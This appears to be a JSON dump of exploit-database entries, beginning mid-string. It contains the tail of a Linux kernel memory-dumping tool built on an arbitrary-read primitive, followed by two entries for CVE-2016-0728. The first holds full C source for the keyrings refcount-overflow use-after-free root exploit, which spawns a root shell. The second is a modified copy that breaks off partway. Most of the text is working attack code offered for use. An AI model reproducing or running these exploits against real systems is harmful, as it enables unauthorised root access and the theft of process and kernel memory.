pmd_e->entries[index].pte;\n\n\tindex = pte_index(addr);\n\tdebug1(\" pte: %016lx, index: %d\\n\", pte_e->addr, index);\n\tif (!pte_e->entries[index]) {\n\t\tunsigned long pte_v = read_8(\n\t\t\tpte_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pte_v);\n\t\tif (pte_none(pte_v)) {\n\t\t\tdebug1(\" not found, pte is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pte_present(pte_v)) {\n\t\t\tdebug1(\" not found, pte is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tphys_a = ptsc->physmap + (pte_v & PHYSICAL_PAGE_MASK) +\n\t\t\t\t(addr & ~PAGE_MASK);\n\t\tpte_e->entries[index] = phys_a;\n\t}\n\tphys_a = 
pte_e->entries[index];\n\n\treturn phys_a;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic unsigned long find_task_by_pid(unsigned long init_task, unsigned pid) {\n\tunsigned long cur_task = init_task;\n\t\n\twhile (true) {\n\t\tunsigned cur_pid =\n\t\t\tread_field_4(cur_task, O_TASK_STRUCT_PID);\n\t\tif (cur_pid == pid)\n\t\t\treturn cur_task;\n\t\tunsigned long task_next_ptr =\n\t\t\tread_field_8(cur_task, O_TASK_STRUCT_TASKS);\n\t\tcur_task = task_next_ptr - O_TASK_STRUCT_TASKS;\n\t\tif (cur_task == init_task)\n\t\t\treturn 0;\n\t}\n}\n\n#define MAX_MMAPS_PER_TASK 512\n\nstruct mmap_entry {\n\tunsigned long start;\n\tunsigned long end;\n\tunsigned flags;\n};\n\ntypedef void (*mmap_callback)(struct mmap_entry *entry, void *private);\n\nstatic void for_each_mmap_from(unsigned long mmap, mmap_callback callback,\n\t\t\t\tvoid *private) {\n\tstruct mmap_entry entries[MAX_MMAPS_PER_TASK];\n\tint i, count;\n\n\tcount = 0;\n\twhile (mmap != 0) {\n\t\tassert(count < MAX_MMAPS_PER_TASK);\n\t\tunsigned long vm_start =\n\t\t\tread_field_8(mmap, O_VM_AREA_STRUCT_VM_START);\n\t\tunsigned long vm_end =\n\t\t\tread_field_8(mmap, O_VM_AREA_STRUCT_VM_END);\n\t\tif (vm_start >= TASK_SIZE || vm_end >= TASK_SIZE) {\n\t\t\tinfo(\"[-] bad mmap (did the task die?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tunsigned vm_flags =\n\t\t\tread_field_4(mmap, O_VM_AREA_STRUCT_VM_FLAGS);\n\t\tentries[count].start = vm_start;\n\t\tentries[count].end = vm_end;\n\t\tentries[count].flags = vm_flags;\n\t\tcount++;\n\t\tmmap = read_field_8(mmap, O_VM_AREA_STRUCT_VM_NEXT);\n\t}\n\n\tfor (i = 0; i < count; i++)\n\t\tcallback(&entries[i], private);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic unsigned long g_kernel_text = 0;\nstatic unsigned long g_physmap = 0;\n\nstatic struct ptsc g_ptsc;\n\nstatic void physmap_init() {\n\tunsigned long divide_error = read_idt_gate(0);\n\tinfo(\"[.] 
divide_error: %016lx\\n\", divide_error);\n\n\tg_kernel_text = divide_error - O_DIVIDE_ERROR;\n\tinfo(\"[.] kernel text: %016lx\\n\", g_kernel_text);\n\n\tif (O_PAGE_OFFSET_BASE) {\n\t\tunsigned long page_offset_base =\n\t\t\tg_kernel_text + O_PAGE_OFFSET_BASE;\n\t\tinfo(\"[.] page_offset_base: %016lx\\n\", page_offset_base);\n\n\t\tg_physmap = read_8(page_offset_base);\n\t\tinfo(\"[.] physmap: %016lx\\n\", g_physmap);\n\t\tif (g_physmap < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] physmap sanity check failed \"\n\t\t\t\t\t\"(wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t} else {\n\t\tg_physmap = PAGE_OFFSET_BASE;\n\t\tinfo(\"[.] physmap: %016lx\\n\", g_physmap);\n\t}\n}\n\nstatic unsigned long g_mmap = 0;\n\nstatic void pts_init(int pid) {\n\tunsigned long mm;\n\n\tif (pid != 0) {\n\t\tunsigned long init_task = g_kernel_text + O_INIT_TASK;\n\t\tinfo(\"[.] init_task: %016lx\\n\", init_task);\n\n\t\tunsigned long task = find_task_by_pid(init_task, pid);\n\t\tinfo(\"[.] task: %016lx\\n\", task);\n\t\tif (task == 0) {\n\t\t\tinfo(\"[-] task %d not found\\n\", pid);\n\t\t\texit(EXIT_FAILURE);\n\t\t} else if (task < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] task sanity check failed (wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\n\t\tmm = read_field_8(task, O_TASK_STRUCT_MM);\n\t\tinfo(\"[.] task->mm: %016lx\\n\", mm);\n\t\tif (mm == 0) {\n\t\t\tinfo(\"[-] mm not found (kernel task?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t} else if (mm < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] mm sanity check failed (wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\n\t\tg_mmap = read_field_8(mm, O_MM_STRUCT_MMAP);\n\t\tinfo(\"[.] task->mm->mmap: %016lx\\n\", g_mmap);\n\t\tif (g_mmap < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] mmap sanity check failed (wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t} else {\n\t\tmm = g_kernel_text + O_INIT_MM;\n\t}\n\n\tunsigned long pgd = read_field_8(mm, O_MM_STRUCT_PGD);\n\tinfo(\"[.] 
task->mm->pgd: %016lx\\n\", pgd);\n\tif (pgd < PAGE_OFFSET_BASE) {\n\t\tinfo(\"[-] pgd sanity check failed (wrong offset?)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tptsc_init(&g_ptsc, g_physmap, pgd);\n}\n\nstatic unsigned long page_virt_to_phys(unsigned long addr) {\n\tunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr);\n\tassert(paddr != 0);\n\treturn paddr - g_physmap;\n}\n\nstatic bool page_check_virt(unsigned long addr) {\n\tunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr);\n\treturn paddr != 0;\n}\n\nstatic bool page_check_phys(unsigned long offset) {\n\treturn page_check_virt(g_physmap + offset);\n}\n\nstatic void phys_read_range(unsigned long offset, size_t length, char *buffer) {\n\tread_range(g_physmap + offset, length, buffer);\n}\n\nstatic void for_each_mmap(mmap_callback callback, void *private) {\n\tfor_each_mmap_from(g_mmap, callback, private);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic int create_file(const char *path) {\n\tint fd = open(path, O_RDWR | O_CREAT, 0644);\n\tif (fd < 0) {\n\t\tperror(\"[-] open()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn fd;\n}\n\nstatic int open_dir(const char *path) {\n\tint fd = open(path, O_DIRECTORY | O_PATH);\n\tif (fd < 0) {\n\t\tperror(\"[-] open()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn fd;\n}\n\nstatic int create_file_in_dir(int dirfd, const char *name) {\n\tint fd = openat(dirfd, name, O_RDWR | O_CREAT, 0644);\n\tif (fd < 0) {\n\t\tperror(\"[-] openat()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn fd;\n}\n\nstatic void write_file(int fd, char *buffer, size_t length) {\n\tint rv = write(fd, buffer, length);\n\tif (rv != length) {\n\t\tperror(\"[-] write()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic void write_bytes(int fd, unsigned long src_addr,\n\t\t\tchar *buffer, size_t 
length) {\n\tif (fd < 0)\n\t\tprint_bytes(LOG_INFO, src_addr, buffer, length);\n\telse\n\t\twrite_file(fd, buffer, length);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nvoid read_virt_memory(unsigned long addr, size_t length, int fd) {\n\tchar buffer[PAGE_SIZE];\n\tchar empty[PAGE_SIZE];\n\n\tdebug1(\"read_virt_memory: addr = %016lx, length = %016lx\\n\",\n\t\t\taddr, length);\n\n\tmemset(&empty[0], 0, sizeof(empty));\n\n\tsize_t total_read = 0;\n\twhile (total_read < length) {\n\t\tunsigned long current = addr + total_read;\n\t\tsize_t to_read = PAGE_SIZE;\n\t\tif (current % PAGE_SIZE != 0)\n\t\t\tto_read = PAGE_SIZE - current % PAGE_SIZE;\n\t\tto_read = min(to_read, length - total_read);\n\t\tif (page_check_virt(addr + total_read)) {\n\t\t\tread_range(addr + total_read, to_read, &buffer[0]);\n\t\t\twrite_bytes(fd, addr + total_read, &buffer[0], to_read);\n\t\t} else {\n\t\t\twrite_bytes(fd, addr + total_read, &empty[0], to_read);\n\t\t}\n\t\ttotal_read += to_read;\n\t}\n}\n\nvoid read_phys_memory(unsigned long src_addr, unsigned long offset,\n\t\t\tsize_t length, int fd) {\n\tchar buffer[PAGE_SIZE];\n\tchar empty[PAGE_SIZE];\n\n\tdebug1(\"read_phys_memory: offset = %016lx, length = %016lx\\n\",\n\t\t\toffset, length);\n\n\tmemset(&empty[0], 0, sizeof(empty));\n\n\tsize_t total_read = 0;\n\twhile (total_read < length) {\n\t\tunsigned long current = offset + total_read;\n\t\tsize_t to_read = PAGE_SIZE;\n\t\tif (current % PAGE_SIZE != 0)\n\t\t\tto_read = PAGE_SIZE - current % PAGE_SIZE;\n\t\tto_read = min(to_read, length - total_read);\n\t\tif (page_check_phys(offset + total_read)) {\n\t\t\tphys_read_range(offset + total_read, to_read,\n\t\t\t\t\t\t&buffer[0]);\n\t\t\twrite_bytes(fd, src_addr + offset + total_read,\n\t\t\t\t\t&buffer[0], to_read);\n\t\t} else {\n\t\t\twrite_bytes(fd, src_addr + offset + total_read,\n\t\t\t\t\t&empty[0], to_read);\n\t\t}\n\t\ttotal_read += to_read;\n\t}\n}\n\n// # # # # # # # # # # # # # # # 
# # # # # # # # # # # # # # # # # # # # # # #\n\n#define VM_READ\t\t0x00000001\n#define VM_WRITE\t0x00000002\n#define VM_EXEC\t\t0x00000004\n\nstatic void print_mmap(unsigned long start, unsigned long end, unsigned flags) {\n\tinfo(\"[%016lx, %016lx) %s%s%s\\n\",\n\t\tstart, end,\n\t\t(flags & VM_READ) ? \"r\" : \"-\",\n\t\t(flags & VM_WRITE) ? \"w\" : \"-\",\n\t\t(flags & VM_EXEC) ? \"x\" : \"-\");\n}\n\nstatic void name_mmap(unsigned long start, unsigned long end, unsigned flags,\n\t\t\tchar *buffer, size_t length) {\n\tsnprintf(buffer, length, \"%016lx_%016lx_%s%s%s\",\n\t\tstart, end,\n\t\t(flags & VM_READ) ? \"r\" : \"-\",\n\t\t(flags & VM_WRITE) ? \"w\" : \"-\",\n\t\t(flags & VM_EXEC) ? \"x\" : \"-\");\n}\n\nstatic void save_mmap(struct mmap_entry *entry, void *private) {\n\tint dirfd = (int)(unsigned long)private;\n\tunsigned long length;\n\tchar name[128];\n\tchar empty[PAGE_SIZE];\n\n\tassert(entry->start % PAGE_SIZE == 0);\n\tassert(entry->end % PAGE_SIZE == 0);\n\n\tmemset(&empty, 0, sizeof(empty));\n\tlength = entry->end - entry->start;\n\n\tprint_mmap(entry->start, entry->end, entry->flags);\n\tname_mmap(entry->start, entry->end, entry->flags,\n\t\t\t&name[0], sizeof(name));\n\tint fd = create_file_in_dir(dirfd, &name[0]);\n\n\tsize_t total_read = 0;\n\twhile (total_read < length) {\n\t\tif (page_check_virt(entry->start + total_read)) {\n\t\t\tunsigned long offset = page_virt_to_phys(\n\t\t\t\tentry->start + total_read);\n\t\t\tread_phys_memory(entry->start + total_read, offset,\n\t\t\t\t\t\tPAGE_SIZE, fd);\n\t\t} else {\n\t\t\twrite_bytes(fd, entry->start + total_read,\n\t\t\t\t\t&empty[0], PAGE_SIZE);\n\t\t}\n\t\ttotal_read += PAGE_SIZE;\n\t}\n\n\tclose(fd);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nunsigned long get_phys_size() {\n\tstruct sysinfo info;\n\tint rv = sysinfo(&info);\n\tif (rv != 0) {\n\t\tperror(\"sysinfo()\");\n\t\treturn EXIT_FAILURE;\n\t}\n\tdebug1(\"phys size: %016lx\\n\", 
info.totalram);\n\treturn info.totalram;\n}\n\nvoid phys_search(unsigned long start, unsigned long end, char *needle) {\n\tchar buffer[PAGE_SIZE];\n\tint length = strlen(needle);\n\n\tassert(length <= PAGE_SIZE);\n\n\tunsigned long offset;\n\tfor (offset = start; offset < end; offset += PAGE_SIZE) {\n\t\tif (offset % (32ul << 20) == 0)\n\t\t\tinfo(\"[.] now at %016lx\\n\", offset);\n\t\tif (!page_check_phys(offset))\n\t\t\tcontinue;\n\t\tphys_read_range(offset, length,\t&buffer[0]);\n\t\tif (memcmp(&buffer[0], needle, length) != 0)\n\t\t\tcontinue;\n\t\tinfo(\"[+] found at %016lx\\n\", offset);\n\t\treturn;\n\t}\n\tinfo(\"[-] not found\\n\");\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define CMD_IDT\t\t1\n#define CMD_PID\t\t2\n#define CMD_VIRT\t3\n#define CMD_PHYS\t4\n#define CMD_SEARCH\t5\n\nint g_cmd = 0;\n\nstatic unsigned g_num = 1;\nstatic unsigned g_pid = 0;\nstatic unsigned long g_addr = 0;\nstatic unsigned long g_length = 0;\nstatic unsigned long g_offset = 0;\nstatic const char *g_dir = NULL;\nstatic const char *g_file = NULL;\nstatic char *g_string = NULL;\n\nstatic void print_usage(const char* name) {\n\tinfo(\"Usage: \\n\");\n\tinfo(\" %s idt [NUM] \"\n\t\t\t\"dump IDT entries\\n\", name);\n\tinfo(\" %s pid PID DIR \"\n\t\t\t\"dump process memory\\n\", name);\n\tinfo(\" %s virt ADDR LENGTH [FILE] \"\n\t\t\t\"dump virtual memory\\n\", name);\n\tinfo(\" %s phys OFFSET LENGTH [FILE] \"\n\t\t\t\"dump physical memory\\n\", name);\n\tinfo(\" %s search STRING [OFFSET [LENGTH]] \"\n\t\t\t\"search start of each physical page\\n\", name);\n\tinfo(\"\\n\");\n\tinfo(\" NUM, PID - decimals\\n\");\n\tinfo(\" ADDR, LENGTH, OFFSET - hex\\n\");\n\tinfo(\" DIR, FILE, STRING - strings\\n\");\n}\n\nstatic bool parse_u(char *s, int base, unsigned *out) {\n\tint length = strlen(s);\n\tchar *endptr = NULL;\n\tunsigned long result = strtoul(s, &endptr, base);\n\tif (endptr != s + length)\n\t\treturn false;\n\t*out = 
result;\n\treturn true;\n}\n\nstatic bool parse_ul(char *s, int base, unsigned long *out) {\n\tint length = strlen(s);\n\tchar *endptr = NULL;\n\tunsigned long result = strtoul(s, &endptr, base);\n\tif (endptr != s + length)\n\t\treturn false;\n\t*out = result;\n\treturn true;\n}\n\nstatic int parse_cmd(const char *cmd) {\n\tif (strcmp(cmd, \"idt\") == 0)\n\t\treturn CMD_IDT;\n\tif (strcmp(cmd, \"pid\") == 0)\n\t\treturn CMD_PID;\n\tif (strcmp(cmd, \"virt\") == 0)\n\t\treturn CMD_VIRT;\n\tif (strcmp(cmd, \"phys\") == 0)\n\t\treturn CMD_PHYS;\n\tif (strcmp(cmd, \"search\") == 0)\n\t\treturn CMD_SEARCH;\n\treturn 0;\n}\n\nstatic bool parse_args(int argc, char **argv) {\n\tif (argc < 2)\n\t\treturn false;\n\n\tg_cmd = parse_cmd(argv[1]);\n\n\tswitch (g_cmd) {\n\tcase CMD_IDT:\n\t\tif (argc > 3)\n\t\t\treturn false;\n\t\tif (argc >= 3 && !parse_u(argv[2], 10, &g_num))\n\t\t\treturn false;\n\t\treturn true;\n\tcase CMD_PID:\n\t\tif (argc != 4)\n\t\t\treturn false;\n\t\tif (!parse_u(argv[2], 10, &g_pid))\n\t\t\treturn false;\n\t\tif (g_pid <= 0)\n\t\t\treturn false;\n\t\tg_dir = argv[3];\t\n\t\tdebug1(\"CMD_PID %u %s\\n\", g_pid, g_dir);\n\t\treturn true;\n\tcase CMD_VIRT:\n\t\tif (argc < 4 || argc > 5)\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[2], 16, &g_addr))\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[3], 16, &g_length))\n\t\t\treturn false;\n\t\tif (argc == 5)\n\t\t\tg_file = argv[4];\n\t\tdebug1(\"CMD_VIRT %016lx %016lx %s\\n\", g_addr,\n\t\t\t\tg_length, g_file ? g_file : \"NULL\");\n\t\treturn true;\n\tcase CMD_PHYS:\n\t\tif (argc < 4 || argc > 5)\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[2], 16, &g_offset))\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[3], 16, &g_length))\n\t\t\treturn false;\n\t\tif (argc == 5)\n\t\t\tg_file = argv[4];\n\t\tdebug1(\"CMD_PHYS %016lx %016lx %s\\n\", g_offset,\n\t\t\t\tg_length, g_file ? 
g_file : \"NULL\");\n\t\treturn true;\n\tcase CMD_SEARCH:\n\t\tif (argc < 3 || argc > 5)\n\t\t\treturn false;\n\t\tg_string = argv[2];\n\t\tif (argc >= 4 && !parse_ul(argv[3], 16, &g_offset))\n\t\t\treturn false;\n\t\tif (argc >= 5 && !parse_ul(argv[4], 16, &g_length))\n\t\t\treturn false;\n\t\tdebug1(\"CMD_SEARCH <%s> %016lx %016lx\\n\",\n\t\t\t\tg_string, g_offset, g_length);\n\t\treturn true;\n\tdefault:\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nvoid handle_cmd_idt() {\n\tinfo(\"[.] dumping IDT\\n\");\n\tprint_idt(g_num);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_virt() {\n\tint fd = -1;\n\tinfo(\"[.] dumping virtual memory [%016lx, %016lx):\\n\",\n\t\tg_addr, g_addr + g_length);\n\tif (g_file != NULL)\n\t\tfd = create_file(g_file);\n\tread_virt_memory(g_addr, g_length, fd);\n\tif (fd != -1)\n\t\tclose(fd);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_phys() {\n\tint fd = -1;\n\tinfo(\"[.] dumping physical memory [%016lx, %016lx):\\n\",\n\t\tg_offset, g_offset + g_length);\n\tif (g_file != NULL)\n\t\tfd = create_file(g_file);\n\tread_phys_memory(0, g_offset, g_length, fd);\n\tif (fd != -1)\n\t\tclose(fd);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_pid() {\n\tinfo(\"[.] dumping mmaps for %u:\\n\", g_pid);\n\tint dirfd = open_dir(g_dir);\n\tfor_each_mmap(save_mmap, (void *)(unsigned long)dirfd);\n\tclose(dirfd);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_search() {\n\tunsigned long start = g_offset ? g_offset : 0;\n\tunsigned long end = g_length ? (start + g_length) : get_phys_size();\n\tinfo(\"[.] 
searching [%016lx, %016lx) for '%s':\\n\",\n\t\t\tstart, end, g_string);\n\tphys_search(start, end, g_string);\n\tinfo(\"[+] done\\n\");\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nint main(int argc, char **argv) {\n\tassert(getpagesize() == PAGE_SIZE);\n\n\tif (!parse_args(argc, argv)) {\n\t\tprint_usage(argv[0]);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tarbitrary_read_init();\n\n\tif (g_cmd == CMD_IDT) {\n\t\thandle_cmd_idt();\n\t\treturn EXIT_SUCCESS;\n\t}\n\n\tphysmap_init();\n\n\tswitch (g_cmd) {\n\tcase CMD_VIRT:\n\t\tpts_init(getpid());\n\t\thandle_cmd_virt();\n\t\tbreak;\n\tcase CMD_PHYS:\n\t\tpts_init(0);\n\t\thandle_cmd_phys();\n\t\tbreak;\n\tcase CMD_SEARCH:\n\t\tpts_init(0);\n\t\thandle_cmd_search();\n\t\tbreak;\n\tcase CMD_PID:\n\t\tpts_init(g_pid);\n\t\thandle_cmd_pid();\n\t\tbreak;\n\t}\n\n\treturn EXIT_SUCCESS;\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */\n/* $ ./cve_2016_072 PP_KEY */\n\n/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff81094250)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n\tconst char *keyring_name;\n\tsize_t i = 0;\n unsigned long int l = 0x100000000/2;\n\tkey_serial_t serial = -1;\n\tpid_t pid = -1;\n struct key_type * my_key_type = NULL;\n \nstruct { long mtype;\n\t\tchar mtext[STRUCT_LEN];\n\t} msg = 
{0x4141414141414141, {0}};\n\tint msqid;\n\n\tif (argc != 2) {\n\t\tputs(\"usage: ./keys <key_name>\");\n\t\treturn 1;\n\t}\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \n commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;\n \n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n\t/* Set the new session keyring before we start */\n\n\tserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n\tif (serial < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n }\n\t\n\tif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n\t}\n\n\n\tputs(\"Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n\n puts(\"finished increfing\");\n puts(\"forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, 
sizeof(msg.mtext), 0) == -1) {\n perror(\"msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n \n puts(\"finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 
19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* CVE-2016-0728 local root exploit\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\n props to grsecurity/PaX for preventing this in so many ways\n\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\n $ ./cve_2016_072 PP_KEY */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\n/* thanks spender - Federico Bento 